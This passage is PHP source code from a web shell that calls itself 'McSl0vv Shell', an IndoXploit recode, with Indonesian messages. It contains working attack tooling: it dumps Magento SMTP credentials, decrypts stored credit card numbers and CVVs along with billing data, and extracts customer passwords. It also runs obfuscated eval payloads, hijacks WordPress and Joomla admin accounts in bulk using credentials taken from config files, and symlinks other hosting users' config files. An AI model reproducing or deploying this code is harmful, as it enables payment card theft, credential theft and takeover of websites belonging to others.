  724. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  725. if(mysql_num_rows($query_smtp) != 0){
  726. if (!$query_smtp){
  727. echo "<center><b>Gagal</b></center>";
  728. }else{
  729. echo'<br><br>
  730. ====================================================================<br>
  731. [ SMTP ] <br>
  732. ====================================================================<br>';
  733. }
  734. echo "
  735. <table border='1' align='center' >
  736. <tr>
  737. <td>no</td>
  738. <td>host</td>
  739. <td>port</td>
  740. <td>user</td>
  741. <td>pass</td>
  742. </tr>";
  743. $no = 1;
  744. $batas = 0;
  745. while($rows = mysql_fetch_array($query_smtp)) {
  746. $smtphost = $rows[0];
  747. $smtpport = $rows[1];
  748. $smtpuser = $rows[2];
  749. $smtppass = $rows[3];
  750. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  751. $no++;
  752. }
  753. echo "</table><br>";
  754. }
  755. //=========================================================================================================
  756. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  757. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  758. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  759. echo'<br><br>
  760. ====================================================================<br>
  761. [ Credit Card ] <br>
  762. ====================================================================<br>';
  763. echo "
  764. <table border='1' align='left' >
  765. <tr>
  766. <td>no</td>
  767. <td>Date</td>
  768. <td>Credit Owner</td>
  769. <td>method</td>
  770. <td>Credit Number</td>
  771. <td>Credit Exp</td>
  772. <td>CVV</td>
  773. <td>Address</td>
  774. </tr>";
  775. $no = 1;
  776. $batas = 0;
  777. while($vx = mysql_fetch_array($query)){
  778. $date = $vx['updated_at'];
  779. $cc_owner = $vx['cc_owner'];
  780. $method = $vx['method'];
  781. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  782. $exp = $vx['exp'];
  783. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  784. $Billing_Address = $vx['Billing Address'];
  785. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  786. $batas = $no++;
  787. }
  788.  
  789. while($vx2 = mysql_fetch_array($query2)){
  790. $batas +=1;
  791. $cc_owner = $vx2['cc_owner'];
  792. $method = $vx2['method'];
  793. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  794. $exp = $vx2['exp'];
  795. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  796. $Billing_Address = $vx2['Billing Address'];
  797. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  798. $batas++;
  799. }
  800.  
  801. echo "</table><br>";
  802. }
  803. //=========================================================================================================
  804. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  805. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  806.  
  807.  
  808. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  809. if (!$query){
  810. echo "<center><b>Gagal</b></center>";
  811. }else{
  812. echo'<br><br>
  813. ====================================================================<br>
  814. [ Customer ] <br>
  815. ====================================================================<br>';
  816. }
  817. echo "
  818. <table border='1' align='center' >
  819. <tr>
  820. <td>no</td>
  821. <td>user</td>
  822. <td>pass</td>
  823. </tr>";
  824. $no = 1;
  825. $batas = 0;
  826. while($vx = mysql_fetch_array($query)) {
  827. $user = $vx['email'];
  828. $pass = $vx['value'];
  829. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  830. $batas = $no++;
  831. }
  832.  
  833. if(mysql_num_rows($query2) != 0 && ($query2)){
  834. while($vx2 = mysql_fetch_array($query2)){
  835. $user = $vx2['customer_email'];
  836. $pass = $crypto->decrypt($vx2['password_hash']);
  837. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  838. $batas +=1;
  839. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  840. $batas++;
  841. }
  842. }
  843. }
  844.  
  845. echo "</table><br>";
  846. }
  847. //=========================================================================================================
  848. }
  849. }
  850. function save($format,$data){
  851. $fp = fopen($format, 'a');
  852. fwrite($fp, $data);
  853. fclose($fp);
  854. }
  855. function cekbase64($string){
  856. $decoded = base64_decode($string, true);
  857. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  858. if(!base64_decode($string, true)) return false;
  859. if(base64_encode($decoded) != $string) return false;
  860. return true;//nilai return 1 jika true
  861. }
  862. //----untuk decode password ---/
  863. class Varien_Crypt_Mcrypt{
  864. /**
  865. * Constuctor
  866. *
  867. * @param array $data
  868. */
  869. public function __construct()
  870. {
  871. }
  872.  
  873. /**
  874. * Initialize mcrypt module
  875. *
  876. * @param string $key cipher private key
  877. * @return Varien_Crypt_Mcrypt
  878. */
  879. public function init($key)
  880. {
  881. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  882. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  883. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  884.  
  885. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  886. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  887. return null;
  888. }
  889.  
  890. mcrypt_generic_init($this->handler, $key, $iv);
  891.  
  892. return $this;
  893. }
  894.  
  895. /**
  896. * Encrypt data
  897. *
  898. * @param string $data source string
  899. * @return string
  900. */
  901. public function encrypt($data)
  902. {
  903. if (!$this->handler) {
  904. //throw new Varien_Exception('Crypt module is not initialized.');
  905. return null;
  906. }
  907. if (strlen($data) == 0) {
  908. return $data;
  909. }
  910. return base64_encode(mcrypt_generic($this->handler, $data));
  911. }
  912.  
  913. /**
  914. * Decrypt data
  915. *
  916. * @param string $data encrypted string
  917. * @return string
  918. */
  919. public function decrypt($data)
  920. {
  921. if (!$this->handler) {
  922. //throw new Varien_Exception('Crypt module is not initialized.');
  923. return null;
  924. }
  925. if (strlen($data) == 0) {
  926. return $data;
  927. }
  928. return mdecrypt_generic($this->handler, base64_decode($data));
  929. }
  930.  
  931.  
  932. /**
  933. * Desctruct cipher module
  934. *
  935. */
  936. public function __destruct()
  937. {
  938. if ($this->handler) {
  939. $this->_reset();
  940. }
  941. }
  942.  
  943. protected function _reset()
  944. {
  945. mcrypt_generic_deinit($this->handler);
  946. mcrypt_module_close($this->handler);
  947. }
  948. }
  949. }
  950. elseif($_GET['ikiw'] == 'zip') {
  951. echo "<center><h1>Zip Menu</h1>";
  952. function rmdir_recursive($McSl0vv) {
  953. foreach(scandir($McSl0vv) as $file) {
  954. if ('.' === $file || '..' === $file) continue;
  955. if (is_dir("$McSl0vv/$file")) rmdir_recursive("$McSl0vv/$file");
  956. else unlink("$McSl0vv/$file");
  957. }
  958. rmdir($McSl0vv);
  959. }
  960. if($_FILES["zip_file"]["name"]) {
  961. $filename = $_FILES["zip_file"]["name"];
  962. $source = $_FILES["zip_file"]["tmp_name"];
  963. $type = $_FILES["zip_file"]["type"];
  964. $name = explode(".", $filename);
  965. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  966. foreach($accepted_types as $mime_type) {
  967. if($mime_type == $type) {
  968. $okay = true;
  969. break;
  970. }
  971. }
  972. $continue = strtolower($name[1]) == 'zip' ? true : false;
  973. if(!$continue) {
  974. $message = "Itu Bukan Zip , , GOBLOK COK";
  975. }
  976. $path = dirname(__FILE__).'/';
  977. $filenoext = basename ($filename, '.zip');
  978. $filenoext = basename ($filenoext, '.ZIP');
  979. $targetdir = $path . $filenoext;
  980. $targetzip = $path . $filename;
  981. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  982. mkdir($targetdir, 0777);
  983. if(move_uploaded_file($source, $targetzip)) {
  984. $zip = new ZipArchive();
  985. $x = $zip->open($targetzip);
  986. if ($x === true) {
  987. $zip->extractTo($targetdir);
  988. $zip->close();
  989.  
  990. unlink($targetzip);
  991. }
  992. $message = "<b>Sukses Gan :)</b>";
  993. } else {
  994. $message = "<b>Error Gan :(</b>";
  995. }
  996. }
  997. echo '<table style="width:100%" border="1">
  998. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  999. <label>Zip File : <input type="file" name="zip_file" /></label>
  1000. <input type="submit" name="submit" value="Upload And Unzip" />
  1001. </form>';
  1002. if($message) echo "<p>$message</p>";
  1003. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='McSl0vv' value='$McSl0vv' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$McSl0vv/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1004. if($_POST['backup']){
  1005. $save=$_POST['save'];
  1006. function Zip($source, $destination)
  1007. {
  1008. if (extension_loaded('zip') === true)
  1009. {
  1010. if (file_exists($source) === true)
  1011. {
  1012. $zip = new ZipArchive();
  1013.  
  1014. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1015. {
  1016. $source = realpath($source);
  1017.  
  1018. if (is_dir($source) === true)
  1019. {
  1020. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1021.  
  1022. foreach ($files as $file)
  1023. {
  1024. $file = realpath($file);
  1025.  
  1026. if (is_dir($file) === true)
  1027. {
  1028. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1029. }
  1030.  
  1031. else if (is_file($file) === true)
  1032. {
  1033. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1034. }
  1035. }
  1036. }
  1037.  
  1038. else if (is_file($source) === true)
  1039. {
  1040. $zip->addFromString(basename($source), file_get_contents($source));
  1041. }
  1042. }
  1043.  
  1044. return $zip->close();
  1045. }
  1046. }
  1047.  
  1048. return false;
  1049. }
  1050. Zip($_POST['McSl0vv'],$save);
  1051. echo "Done , Save To <b>$save</b>";
  1052. }
  1053. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='McSl0vv' value='$McSl0vv/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$McSl0vv/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1054. if($_POST['extrak']){
  1055. $save=$_POST['save'];
  1056. $zip = new ZipArchive;
  1057. $res = $zip->open($_POST['McSl0vv']);
  1058. if ($res === TRUE) {
  1059. $zip->extractTo($save);
  1060. $zip->close();
  1061. echo 'Succes , Location : <b>'.$save.'</b>';
  1062. } else {
  1063. echo 'Gagal Mas :( Ntahlah !';
  1064. }
  1065. }
  1066. echo '</tr></table>';
  1067. }
  1068. elseif($_GET['ikiw'] == 'shellchk') {
  1069. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1070. } elseif($_GET['ikiw'] == 'loghunter')
  1071. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  1072. elseif($_GET['ikiw'] == 'metu') {
  1073.  
  1074.  
  1075. echo '<form action="?McSl0vv=$McSl0vv&ikiw=metu" method="post">';
  1076. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1077. echo 'Byee !';
  1078.  
  1079. }
  1080. elseif($_GET['ikiw'] == 'about') {
  1081.  
  1082. echo '<center>McSl0vv Shell<hr>IndoXploit Shell Recoded By McSl0vv<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
  1083.  
  1084. }
  1085. elseif($_GET['ikiw'] == 'auto_cu_wp') {
  1086. if($_POST['gass']) {
  1087. echo "<center><h1>WordPress Auto Change User 2</h1>
  1088. <form method='post'>
  1089. Link Config: <br>
  1090. <textarea name='link' style='width: 450px; height:250px;'>";
  1091. UrlLoop($_POST['linkconf'],'wordpress');
  1092. echo"</textarea><br>
  1093. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1094. </form></center>";
  1095. } else {
  1096. echo "<center><h1>WordPress Auto Change User 2</h1>
  1097. <form method='post'>
  1098. Link Config: <br>
  1099. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/McSl0vv_Symconf/'><br>
  1100. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1101. </form></center>";
  1102. }
  1103. if($_POST['auto_cu_wp']) {
  1104.  
  1105. function anucurl($sites) {
  1106. $ch = curl_init($sites);
  1107. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1108. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1109. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1110. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1111. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1112. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1113. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1114. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1115. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1116. $data = curl_exec($ch);
  1117. curl_close($ch);
  1118. return $data;
  1119. }
  1120. $link = explode("\r\n", $_POST['link']);
  1121. $user = "McSl0vv";
  1122. $pass = "McSl0vv";
  1123. $passx = md5($pass);
  1124. foreach($link as $McSl0vv_config) {
  1125. $config = anucurl($McSl0vv_config);
  1126. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1127. $dbuser = ambilkata($config,"DB_USER', '","'");
  1128. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1129. $dbname = ambilkata($config,"DB_NAME', '","'");
  1130. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1131. $prefix = $dbprefix."users";
  1132. $option = $dbprefix."options";
  1133. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1134. $db = mysql_select_db($dbname);
  1135. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1136. $result = mysql_fetch_array($q);
  1137. $id = $result[ID];
  1138. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1139. $result2 = mysql_fetch_array($q2);
  1140. $target = $result2[option_value];
  1141. if($target == '') {
  1142. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1143. } else {
  1144. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1145. }
  1146. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1147. if(!$conn OR !$db OR !$update) {
  1148. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1149. mysql_close($conn);
  1150. } else {
  1151. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1152. echo "[+] username: <font color=lime>$user</font><br>";
  1153. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1154.  
  1155. mysql_close($conn);
  1156. }
  1157. }
  1158. }
  1159.  
  1160. }
  1161. elseif($_GET['ikiw'] == 'auto_cu_joomla') {
  1162. if($_POST['gass']) {
  1163. echo "<center><h1>Joomla Auto Change User 2</h1>
  1164. <form method='post'>
  1165. Link Config: <br>
  1166. <textarea name='link' style='width: 450px; height:250px;'>";
  1167. UrlLoop($_POST['linkconf'],'joomla');
  1168. echo"</textarea><br>
  1169. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1170. </form></center>";
  1171. } else {
  1172. echo "<center><h1>Joomla Auto Change User 2</h1>
  1173. <form method='post'>
  1174. Link Config: <br>
  1175. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/McSl0vv_Symconf/'><br>
  1176. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1177. </form></center>";
  1178. }
  1179. if($_POST['auto_cu_joomla']) {
  1180.  
  1181. function anucurl($sites) {
  1182. $ch = curl_init($sites);
  1183. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1184. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1185. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1186. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1187. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1188. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1189. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1190. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1191. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1192. $data = curl_exec($ch);
  1193. curl_close($ch);
  1194. return $data;
  1195. }
  1196. $link = explode("\r\n", $_POST['link']);
  1197. $user = "McSl0vv";
  1198. $pass = "McSl0vv";
  1199. $passx = md5($pass);
  1200. foreach($link as $McSl0vv_config) {
  1201. $config = anucurl($McSl0vv_config);
  1202. $dbhost = ambilkata($config,"host = '","'");
  1203. $dbuser = ambilkata($config,"user = '","'");
  1204. $dbpass = ambilkata($config,"password = '","'");
  1205. $dbname = ambilkata($config,"db = '","'");
  1206. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1207. $prefix = $dbprefix."users";
  1208. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1209. $db = mysql_select_db($dbname);
  1210. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1211. $result = mysql_fetch_array($q);
  1212. $id = $result['id'];
  1213. $site = ambilkata($config,"sitename = '","'");
  1214. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1215. echo "Config => ".$McSl0vv_config."<br>";
  1216. echo "CMS => Joomla<br>";
  1217. if($site == '') {
  1218. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1219. } else {
  1220. echo "Sitename => $site<br>";
  1221. }
  1222. if(!$update OR !$conn OR !$db) {
  1223. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1224. } else {
  1225. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1226. }
  1227. mysql_close($conn);
  1228. }
  1229. }
  1230. }
  1231. elseif($_GET['ikiw'] == 'symconfig') {
  1232. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1233. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1234. exit;
  1235. }
  1236. else
  1237. {
  1238. if($_POST["m"] && !$_POST["passwd"]==""){
  1239. @mkdir("McSl0vv_Symconf", 0777);
  1240. @chdir("McSl0vv_Symconf");
  1241. @symlink("/","root");
  1242. $htaccess="Options Indexes FollowSymLinks
  1243. DirectoryIndex McSl0vv.htm
  1244. AddType text/plain .php
  1245. AddHandler text/plain .php
  1246. Satisfy Any";
  1247. @file_put_contents(".htaccess",$htaccess);
  1248. $etc_passwd=$_POST["passwd"];
  1249. $etc_passwd=explode("\n",$etc_passwd);
  1250. foreach($etc_passwd as $passwd){
  1251. $pawd=explode(":",$passwd);
  1252. $user =$pawd[0];
  1253.  
  1254. @symlink('/','McSl0vv_Symconf/root');
  1255. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1256. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1257. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1258. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1259. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1260. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1261. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1262. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1263. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1264. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1265. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1266. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1267. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1268. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1282. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1283. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1286. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1288. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1289. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1291. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1294. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1295. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1296. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1297. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1298. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1299. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
